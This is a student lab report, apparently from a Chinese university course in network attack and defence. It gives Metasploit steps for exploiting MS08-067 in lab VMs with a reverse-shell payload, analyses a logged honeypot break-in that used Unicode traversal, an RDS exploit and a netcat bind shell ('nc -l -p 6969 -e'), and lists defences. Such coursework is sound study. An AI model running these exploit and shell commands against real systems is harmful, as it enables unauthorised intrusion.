20241917 2024-2025-2 《网络攻防实践》实践六报告
1、实践内容
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
2.实验过程
2.1 利用MS08-067漏洞,通过metasploit软件对windows靶机实施远程渗透
kali命令行输入msfconsole,启动msfconsole如下

查找要使用的漏洞对应的模块,输入指令search ms08_067,可以看到对应编号是0。

输入use 0继续使用该模块,键入info 0即可查看靶机适用范围

show options查看攻击漏洞需要的设置

再查看可用载荷,输入指令show payloads

输入set payload generic/shell_reverse_tcp 设置载荷
输入set RHOST 192.168.200.4 设置要攻击的主机
输入set LHOST 192.168.200.3设置本机

输入exploit进行攻击

2.2 取证分析实践:解码一次成功的NT系统破解攻击
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
(1)攻击者使用了什么破解工具进行攻击
打开wireshark打开从学习通下载的log文件

以看到攻击机与目标主机在TCP“三次握手”后建立了连接,发现攻击机经三次握手。输入ip.addr ==172.16.1.106 and http,筛选有用信息进行分析。


编号为117的这一行发现有一些奇怪的路径。这个boot.ini是NT系统的启动文件。而前面的..%c0af..查阅资料后得知,这是"/"的Unicode编码,基本确定存在Unicode漏洞攻击。
(2)攻击者如何使用这个破解工具进入并控制了系统?
在140行然后有一个msadcs.dll文件,这是一个远程数据访问服务的文件,存在RDS漏洞,该漏洞可以导致攻击者远程执行用户系统的命令,并以设备用户的身份运行

筛选tcp.stream eq11进行HTTP流追踪,看到!ADM!ROX!YOUR!WORLD!,根据教材内容,证实这是RDS漏洞攻击,攻击者通过 msadcs.dll 中存在RDS漏洞进行了SQL注入攻击,并执行了命令 cmd /c echo werd >> c:\fun ,特征字符串 ADM!ROX!YOUR!WORLD 出现多次,根据资料可以查询到是由msadc(2).pl渗透攻击工具发起的攻击。

查看1233 号数据包,攻击者执行了这样一条命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口,并且获得了访问权限

(3)当攻击者获得系统的访问权后做了什么?
追踪tcp流可以看到攻击者的行为如下图

查询过程中发现了下图的ADD提权

攻击者删除了一些文件

查询过程中还发现了,已经发现这是实验服务器

(4)我们如何防止这样的攻击
1.为这些漏洞打上补丁.
2.自身的口令设置为强口令,提高破解口令的难度;
3.若没必要使用SCRIPTS和MSADC目录,删除或改名;
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
已经察觉,攻击者在其中留言说echo best honeypot i've seen till now
实验三:windows系统远程渗透攻击和分析
攻击方:20241917李柏衡,使用MS08-067漏洞进行远程渗透攻击,ip:192.168.3.47,攻击机型号:kali。
防守方:20241903朱天宇,ip:192.168.3.50,靶机型号:winxpattacker。


主要步骤同实验一。
首先,在命令行键入msfconsole来启动msfconsole。
然后,我们键入use exploit/windows/smb/ms08_067_netapi来进入漏洞所在的文件。
接着我们键入set payload generic/shell_reverse_tcp设置载荷。键入set RHOST 192.168.3.49设置靶机。键入键入set LHOST 192.168.3.48。

最后,我们键入exploit进行攻击。可以看到,成功入侵了该系统获得了权限。

我们在防守方使用kali上用wireshark监听网络,仔细分析,发现主要利用的漏洞是SMB、DCERPC和SPOOLSS。

我们跟踪TCP流,可以看到靶机的命令行界面。攻击机键入了命令ipconfig和命令dir还有个字符串lbhnb,都可以在TCP流中看到。


三、学习中遇到的问题及解决
—问题一:做实验一时,kali与winXP在同一网段,但是exploit的时候总是失败
—解决方法:后面在朱天宇同学的帮助下,靶机换成win2k,把IP地址换成192.168.200.124,最后成功完成实验
四、学习感想和体会
通过本次实践,通过亲自进行网络攻击,同时也是第一次与同学合作进行实验。对网络攻防实验的理解更加深刻,通过与同学的合作实验也感受到了实验的趣味性。最后再次非常感谢朱天宇同学和恩克同学,我自己一个人做实验时遇到问题非常积极地帮助我,解决了很多问题。
浙公网安备 33010602011771号